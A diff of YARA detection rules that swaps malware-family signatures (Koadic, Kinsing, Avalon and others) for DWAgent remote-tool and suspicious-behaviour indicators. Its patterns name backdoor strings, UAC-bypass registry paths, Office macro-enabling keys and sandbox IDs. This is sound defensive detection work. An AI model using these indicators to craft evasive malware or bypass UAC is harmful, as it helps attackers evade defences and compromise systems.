-		id = "76d6c8df-4e42-5c0a-8344-f8848e7ac945"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1160-L1174"
+		id = "5d124c20-a0f8-5e82-8bab-93a782a2a649"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L484-L501"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f0538e1faee737a08d403a7f321ce45bdc70b390accfe378ba0d26292509fd7"
+		logic_hash = "590d41d2e433a7a1bb373fbd0b0d47818a9867bee0399101881b05e83b586f6e"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-SVC"
 
 	strings:
-		$s1 = "&@cls&@set" ascii
-		$s2 = /:~\d+,1%+/ ascii
-		$s3 = "Header Char" fullword wide
-		$s4 = "EMBED Package" ascii
-		$b1 = ".bat\"%" ascii
-		$b2 = ".bat');\\\"%" ascii
-		$b3 = ".bat',%" ascii
+		$s1 = "\\native\\dwagupd.dll" wide
+		$s2 = "\\native\\dwagsvc.exe\" run" wide
+		$s3 = "CreateServiceW" fullword ascii
+		$s4 = /dwagent\.(pid|start|stop)/ wide
+		$s5 = "Check updating..." wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and all of ( $s* ) and 2 of ( $b* )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_BAT_Koadicbat : FILE
+rule DITEKSHEN_INDICATOR_RMM_Dwagent_Screencapture : FILE
 {
 	meta:
-		description = "Koadic post-exploitation framework BAT payload"
+		description = "Detect DWAgent Remote Administration Tool Screen Capture Module"
 		author = "ditekSHen"
-		id = "dad7bb32-b1f1-5c6d-89b2-77cc49b5f020"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1176-L1186"
+		id = "79586e5e-b7e5-5adc-97f3-0d29ad695079"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L503-L528"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ee6c0189a5111c61af1dbe571524427bff95a7e3907f97ce51d272a8f701cf5"
+		logic_hash = "d3160fd4cce445aa6d2bc6c083893c7610ea5e72824fe9824ad853700f4d3874"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-ScreenCapture"
 
 	strings:
-		$v1_1 = "&@cls&@set" ascii
-		$v2_1 = { 26 63 6c 73 0d 0a 40 25 }
-		$m1 = /:~\d+,1%+/ ascii
+		$s1 = "DWAgentLib" fullword wide
+		$s2 = "PYTHONHOME" wide
+		$s3 = "VirtualBox" wide
+		$s4 = "VMware" wide
+		$s5 = "ScreenCapture::prepareCursor#" ascii
+		$s6 = "ScreenCapture::getMonitorCount#" ascii
+		$s7 = "ScreenCapture::token" ascii
+		$s8 = "dwascreencapture" ascii
+		$s9 = "inputKeyboard CTRLALTCANC" ascii
+		$s10 = "_Z34ScreenCaptureNativeMonitorEnumProc" ascii
+		$s11 = "_Z41ScreenCaptureNativeCreateWindowThreadProc" ascii
+		$s12 = "_ZN13ScreenCapture" ascii
+		$s13 = "isUserInAdminGroup" ascii
 
 	condition:
-		uint16( 0 ) == 0xfeff and ( ( 1 of ( $v1* ) or 1 of ( $v2* ) ) and #m1 > 100 )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_MALWARE_JS_Koadicjs
+rule DITEKSHEN_INDICATOR_RMM_Dwagent_Soundcapture : FILE
 {
 	meta:
-		description = "Koadic post-exploitation framework JS payload"
+		description = "Detect DWAgent Remote Administration Tool Sound Capture Module"
 		author = "ditekSHen"
-		id = "8598d5cb-0486-52b0-a686-6bd014f35c44"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1188-L1208"
+		id = "4e395d1e-96a1-5ecc-abe5-6f8323a2c8ca"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L530-L545"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "689116f74996fecf4c16c224e8cd842ad5b5e989de2dfdf0debeb9a26d8a12fa"
+		logic_hash = "c0efa9f383373dec1c5b9d127c2b4c6f4906718ae8f62eea28d7a369001be5af"
 		score = 75
 		quality = 75
-		tags = ""
+		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-SoundCapture"
 
 	strings:
-		$s1 = "window.moveTo(-" ascii
-		$s2 = "window.onerror = function(sMsg, sUrl, sLine) { return false; }" fullword ascii
-		$s3 = "window.onfocus = function() { window.blur(); }" fullword ascii
-		$s4 = "window.resizeTo(" ascii
-		$s5 = "window.blur();" fullword ascii
-		$hf1 = "<hta:application caption=\"no\" windowState=\"minimize\" showInTaskBar=\"no\"" fullword ascii
-		$hf2 = "<hta:application caption=\"no\" showInTaskBar=\"no\" windowState=\"minimize\" navigable=\"no\" scroll=\"no\""
-		$ht1 = "<hta:application" ascii
-		$ht2 = "caption=\"no\"" ascii
-		$ht3 = "showInTaskBar=\"no\"" ascii
-		$ht4 = "windowState=\"minimize\"" ascii
-		$ht5 = "navigable=\"no\"" ascii
-		$ht6 = "scroll=\"no\"" ascii
+		$s1 = "DWASoundCapture" ascii
+		$s2 = /_Z\d{2}DWASoundCapture/ ascii
+		$s3 = "_Z6recordPvS_" ascii
 
 	condition:
-		all of ( $s* ) and ( 1 of ( $hf* ) or all of ( $ht* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_NETEAGLE : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Dwagent_CERT : FILE
 {
 	meta:
-		description = "NETEAGLE backdoor payload"
+		description = "Detects DWAgent by certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "89d1304a-63a0-50fc-855a-2e36cde1c5e7"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1210-L1225"
+		id = "96572e83-ffb9-58d9-93d1-84e16ae1a3ba"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L547-L563"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "148de0ca332d3885d94eae8d15eb4aaa2bc4950c691c0e8817c816b7d4c55510"
+		logic_hash = "9ed86f053c8d1423aae8cfc6e0bba6021510dfb6d722430c8c7edb15d3e8233a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
-		$s2 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
-		$s4 = "/index.htm" fullword ascii
-		$s5 = "Help_ME" fullword ascii
-		$s6 = "GOTO ERROR" ascii
-		$s7 = "127.0.0.1" fullword ascii
-		$s8 = /pic\d\.bmp/ ascii wide
+		thumbprint = "4a13f46def2c9427898a46a88a6a2122ed106b37"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DWSNET srl" and pe.signatures [ i ] . issuer contains "Sectigo Public Code Signing CA R36" and pe.signatures [ i ] . serial == "00:af:bd:d3:be:b2:4e:1d:e7:37:82:e9:f8:34:7c:f1:53" )
 }
-rule DITEKSHEN_MALWARE_WIN_BACKSPACE : FILE
+rule DITEKSHEN_INDICATOR_OSX_RMM_Dwagent : FILE
 {
 	meta:
-		description = "BACKSPACE backdoor payload"
+		description = "Detect DWAgent Remote Administration Tool macOS run"
 		author = "ditekSHen"
-		id = "ff9b1c2e-66a1-5e09-8bc2-a7543161e518"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1227-L1247"
+		id = "0eeb9ae3-826e-52b7-bbb8-3f8c4920f5c3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L565-L580"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3d366327c2272761349687b11e4d6baada5000936dc7f81665e0303f7d1e5121"
+		logic_hash = "9864668abdd534d8a33940f9513d07356451ce1eaa9233771e82b8138dc0b41b"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Osx.RMM.DWAgent-RUN"
 
 	strings:
-		$s1 = "Software\\Microsoft\\PnpSetup" ascii wide
-		$s2 = "Mutex_lnkword_little" ascii wide
-		$s3 = "(Prxy%c-%s:%u)" fullword ascii
-		$s4 = "(Prxy-No)" fullword ascii
-		$s5 = "/index.htm" fullword ascii
-		$s6 = "CONNECT %s:%d" ascii
-		$s7 = "\\$NtRecDoc$" fullword ascii
-		$s8 = "qazWSX123$%^" ascii
-		$s9 = "Software\\Microsoft\\Core" ascii wide
-		$s10 = "Mutex_lnkch" ascii wide
-		$s11 = "Event__lnkch__" ascii wide
-		$s12 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)" fullword ascii
-		$s13 = "User-Agent: Mozilla/5.00 (compatible; MSIE 6.0; Win32)" fullword ascii
+		$s1 = "net.dwservice.DWAgent" ascii
+		$s2 = "-[DWADelegate" ascii
+		$s3 = "customWindowsToEnterFullScreenForWindow:onScreen:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0xfeca and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Rhttpctrl : FILE
+
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Reflectiveloader : FILE
 {
 	meta:
-		description = "RHttpCtrl backdoor payload"
+		description = "Detects Reflective DLL injection artifacts"
 		author = "ditekSHen"
-		id = "fa80db13-90af-5d6a-bcc2-ad1f6808268e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b7bd9184-48f8-5ad8-a234-632e4ec9814d"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1249-L1265"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L29-L43"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8b27fcc4636c2fe02a0e006295ece7f705cc9a042921f66ef1f9b6a88aaf9a1"
-		score = 75
-		quality = 75
+		logic_hash = "540a48f98652c84b09f1076c2e2fca680781f533c936d602809179469a850ba0"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "%d_%04d%02d%02d%02d%02d%02d." ascii
-		$s2 = "ver=%s&id=%06d&type=" ascii
-		$s3 = "ver=%d&id=%s&random=%d&" ascii
-		$s4 = "id=%d&output=%s" ascii
-		$s5 = "Error:WinHttpCrackUrl failed!/n" ascii
-		$s6 = "Error:SendRequest failed!/n" ascii
-		$s7 = ".exe a %s %s" ascii
-		$s8 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" fullword wide
-		$pdb = "\\WorkSources\\RHttpCtrl\\Server\\Release\\svchost.pdb" ascii
+		$s1 = "_ReflectiveLoader@" ascii wide
+		$s2 = "ReflectiveLoader@" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 1 of them or ( pe.exports ( "ReflectiveLoader@4" ) or pe.exports ( "_ReflectiveLoader@4" ) or pe.exports ( "ReflectiveLoader" ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Pillowmint : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_IMG_Embedded_Archive : FILE
 {
 	meta:
-		description = "PillowMint POS payload"
+		description = "Detects images embedding archives. Observed in TheRat RAT."
 		author = "ditekSHen"
-		id = "e3d26a12-45aa-5f5d-997a-f350bc1bea97"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2c8e15dc-2e84-5f9b-b538-cba204a3d38c"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1267-L1283"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L45-L66"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ed2597fce1c56d2e110790e0eb89834b1bb9f6f52d39105157c9ffe2ede6cc7a"
-		score = 75
-		quality = 50
+		logic_hash = "0e61bc2489a54047c66a659ae2cb6df66683845676e1c02c34d9a0987ddec4bb"
+		score = 40
+		quality = 37
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "system32\\sysvols\\" ascii nocase
-		$s2 = "Sysnative\\sysvols\\" ascii nocase
-		$s3 = "critical.log" fullword ascii
-		$s4 = "log.log" fullword ascii
-		$s5 = "commands.txt" fullword ascii
-		$s6 = "_EV0LuTi0N_" ascii
-		$s7 = /(file|reg)\scmd:/ fullword ascii
-		$s8 = "dumper_nologs_" ascii
-		$s9 = "ReflectiveLoader" ascii
+		$sevenzip1 = { 37 7a bc af 27 1c 00 04 }
+		$sevenzip2 = { 37 e4 53 96 c9 db d6 07 }
+		$zipwopass = { 50 4b 03 04 14 00 00 00 }
+		$zipwipass = { 50 4b 03 04 33 00 01 00 }
+		$zippkfile = { 50 4b 03 04 0a 00 02 00 }
+		$rarheade1 = { 52 61 72 21 1a 07 01 00 }
+		$rarheade2 = { 52 65 74 75 72 6e 2d 50 }
+		$rarheade3 = { 52 61 72 21 1a 07 00 cf }
+		$mscabinet = { 4d 53 46 54 02 00 01 00 }
+		$zlockproe = { 50 4b 03 04 14 00 01 00 }
+		$winzip = { 57 69 6E 5A 69 70 }
+		$pklite = { 50 4B 4C 49 54 45 }
+		$pksfx = { 50 4B 53 70 58 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		( uint32( 0 ) == 0xe0ffd8ff or uint32( 0 ) == 0x474e5089 or uint16( 0 ) == 0x4d42 ) and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Blackshadesrat : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Eventviewer : FILE
 {
 	meta:
-		description = "BlackshadesRAT / Cambot POS payload"
+		description = "detects Windows exceutables potentially bypassing UAC using eventvwr.exe"
 		author = "ditekSHen"
-		id = "bd0ad920-109a-50b5-94af-6580684bff52"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e4e82d5a-a524-5fac-b14c-4e53a95f4f2c"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1285-L1300"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L68-L77"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c2a76ce52bce9c37a3518ff459011acb733c2c5abac74786e41a1c169459ce2"
-		score = 75
-		quality = 75
+		logic_hash = "4b893db727ea3ef07805058e9a93664dc01590f249158d9b825cc9cece935640"
+		score = 40
+		quality = 41
 		tags = "FILE"
-		snort_sid = "920208-920210"
+		importance = 20
 
 	strings:
-		$s1 = "bhookpl.dll" fullword wide
-		$s2 = "drvloadn.dll" fullword wide
-		$s3 = "drvloadx.dll" fullword wide
-		$s4 = "SPY_NET_RATMUTEX" fullword wide
-		$s5 = "\\dump.txt" fullword wide
-		$s6 = "AUTHLOADERDEFAULT" fullword wide
-		$pdb = "*\\AC:\\Users\\Admin\\Desktop_old\\Blackshades project\\bs_bot\\bots\\bot\\bs_bot.vbp" fullword wide
+		$s1 = "\\Classes\\mscfile\\shell\\open\\command" ascii wide nocase
+		$s2 = "eventvwr.exe" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( $pdb and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Goldenspy : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Cleanmgr : FILE
 {
 	meta:
-		description = "GoldenSpy dropper payload"
-		author = "SpiderLabs Trustwave"
-		id = "01d3f14a-fefb-5cea-b055-d7e9f4c7d13b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1302-L1314"
+		description = "detects Windows exceutables potentially bypassing UAC using cleanmgr.exe"
+		author = "ditekSHen"
+		id = "cebbe22d-d54d-5a1e-978a-37ddd96133b7"
+		date = "2024-06-08"
+		modified = "2024-06-08"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L79-L88"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "908047db2167733da0089375dbfd636881e721cc219da110755b81581d438cfa"
-		score = 75
-		quality = 67
+		logic_hash = "9b9e2789bee4f3b54384dabde028a7b6e70b3e0d66090d5141145a72df515db4"
+		score = 40
+		quality = 41
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$reg = "Software\\IDG\\DA" nocase wide ascii
-		$str1 = "requestStr" nocase wide ascii
-		$str2 = "nb_app_log_mutex" nocase wide ascii
-		$str3 = { 510F4345[0-10]50518D8DCCFE[0-20]837D1C[0-20]8D45[0-15]0F4345[0-20]505157 }
+		$s1 = "\\Enviroment\\windir" ascii wide nocase
+		$s2 = "\\system32\\cleanmgr.exe" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and $reg and 2 of ( $str* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Plurox : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Enable_Officemacro : FILE
 {
 	meta:
-		description = "Plurox backdoor payload"
+		description = "Detects Windows executables referencing Office macro registry keys. Observed modifying Office configurations via the registy to enable macros"
 		author = "ditekSHen"
-		id = "c8a97132-c1d5-5456-a055-d46a9399dbdd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2cd26bc8-33c7-5628-982f-dc59ce158082"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1316-L1328"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L90-L108"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c2ec2ce7a9210d8eebb06c755eab51cab93fe6d48d737fd1756ffe42d46b35d1"
-		score = 75
-		quality = 75
+		logic_hash = "18f66cff1fe2ab32366bf385bfe08f4895071c83e26812709eeb334857754c0f"
+		score = 40
+		quality = 39
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "autorun.c" fullword ascii
-		$s2 = "launcher.c" fullword ascii
-		$s3 = "loader.c" fullword ascii
-		$s4 = "stealth.c" fullword ascii
-		$s5 = "RunFromMemory" fullword ascii
+		$s1 = "\\Word\\Security\\VBAWarnings" ascii wide
+		$s2 = "\\PowerPoint\\Security\\VBAWarnings" ascii wide
+		$s3 = "\\Excel\\Security\\VBAWarnings" ascii wide
+		$h1 = "5c576f72645c53656375726974795c5642415761726e696e6773" nocase ascii wide
+		$h2 = "5c506f776572506f696e745c53656375726974795c5642415761726e696e6773" nocase ascii wide
+		$h3 = "5c5c457863656c5c5c53656375726974795c5c5642415761726e696e6773" nocase ascii wide
+		$d1 = "5c%57%6f%72%64%5c%53%65%63%75%72%69%74%79%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii
+		$d2 = "5c%50%6f%77%65%72%50%6f%69%6e%74%5c%53%65%63%75%72%69%74%79%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii
+		$d3 = "5c%5c%45%78%63%65%6c%5c%5c%53%65%63%75%72%69%74%79%5c%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or 2 of ( $h* ) or 2 of ( $d* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Avalon : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Disable_Officeprotectedview : FILE
 {
 	meta:
-		description = "Avalon infostealer payload"
+		description = "Detects Windows executables referencing Office ProtectedView registry keys. Observed modifying Office configurations via the registy to disable ProtectedView"
 		author = "ditekSHen"
-		id = "3de01419-9f45-5d82-8391-2e1e41df2b34"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "fed81219-d141-5fbf-a7b6-518e3d4de6f6"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1330-L1359"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L110-L128"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1aa9dc09ec4c8962dee0455dd367e32139e4c03f1b306f17ac6e82d71aacf713"
-		score = 75
-		quality = 75
+		logic_hash = "14b2c19ec1f1ade9285f9e73a8779865c1e09d5ad1df2e0469b5f4a5eb278110"
+		score = 40
+		quality = 39
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "Parsecards" fullword ascii
-		$s2 = "Please_Gofuckyouself" fullword ascii
-		$s3 = "GetDomainDetect" fullword ascii
-		$s4 = "GetTotalCommander" fullword ascii
-		$s5 = "KnownFolder" fullword ascii
-		$s6 = "set_hidden" fullword ascii
-		$s7 = "set_system" fullword ascii
-		$l1 = "\\DomainDetect.txt" wide
-		$l2 = "\\Grabber_Log.txt" wide
-		$l3 = "\\Programs.txt" wide
-		$l4 = "\\Passwords_Edge.txt" wide
-		$l5 = "\\KL.txt" wide
-		$w1 = "dont touch" fullword wide
-		$w2 = "Grabber" fullword wide
-		$w3 = "Keylogger" fullword wide
-		$w4 = "password-check" fullword wide
-		$w5 = "H4sIAAAAAAAEA" wide
-		$p1 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
-		$p2 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
+		$s1 = "\\Security\\ProtectedView\\DisableInternetFilesInPV" ascii wide
+		$s2 = "\\Security\\ProtectedView\\DisableAttachementsInPV" ascii wide
+		$s3 = "\\Security\\ProtectedView\\DisableUnsafeLocationsInPV" ascii wide
+		$h1 = "5c53656375726974795c50726f746563746564566965775c44697361626c65496e7465726e657446696c6573496e5056" nocase ascii wide
+		$h2 = "5c53656375726974795c50726f746563746564566965775c44697361626c65417474616368656d656e7473496e5056" nocase ascii wide
+		$h3 = "5c53656375726974795c50726f746563746564566965775c44697361626c65556e736166654c6f636174696f6e73496e5056" nocase ascii wide
+		$d1 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%49%6e%74%65%72%6e%65%74%46%69%6c%65%73%49%6e%50%56" nocase ascii
+		$d2 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%41%74%74%61%63%68%65%6d%65%6e%74%73%49%6e%50%56" nocase ascii
+		$d3 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%55%6e%73%61%66%65%4c%6f%63%61%74%69%6f%6e%73%49%6e%50%56" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or 2 of ( $h* ) or 2 of ( $d* ) )
 }
-rule DITEKSHEN_MALWARE_Linux_Kinsing : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Sandboxproductid : FILE
 {
 	meta:
-		description = "Kinsing RAT payload"
+		description = "Detects binaries and memory artifacts referencing sandbox product IDs"
 		author = "ditekSHen"
-		id = "b13d2c36-c8d3-5138-9e9a-8b5390a93c8d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5af0ace7-6ffb-5695-94c5-d8172d326662"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1361-L1376"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L130-L149"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "566eb7d1864e3a8088ad4f5d032d6d62a33080bbfc5c20c2520315cfc8146afc"
-		score = 75
-		quality = 75
+		logic_hash = "3a047ef7e70956e1c2222bde47036d7fff6d98cd8a5df81ea85584a3b5006d4a"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "backconnect" ascii
-		$s2 = "connectForSocks" ascii
-		$s3 = "downloadAndExecute" ascii
-		$s4 = "download_and_exec" ascii
-		$s5 = "masscan" ascii
-		$s6 = "UpdateCommand:" ascii
-		$s7 = "exec_out" ascii
-		$s8 = "doTask with type %s" ascii
+		$id1 = "76487-337-8429955-22614" fullword ascii wide
+		$id2 = "76487-644-3177037-23510" fullword ascii wide
+		$id3 = "55274-640-2673064-23950" fullword ascii wide
+		$id4 = "76487-640-1457236-23837" fullword ascii wide
+		$id5 = "76497-640-6308873-23835" fullword ascii wide
+		$id6 = "76487-640-1464517-23259" fullword ascii wide
+		$id7 = "76487 - 337 - 8429955 - 22614" fullword ascii wide
+		$id8 = "76487 - 644 - 3177037 - 23510" fullword ascii wide
+		$id9 = "55274 - 640 - 2673064 - 23950" fullword ascii wide
+		$id10 = "76487 - 640 - 1457236 - 23837" fullword ascii wide
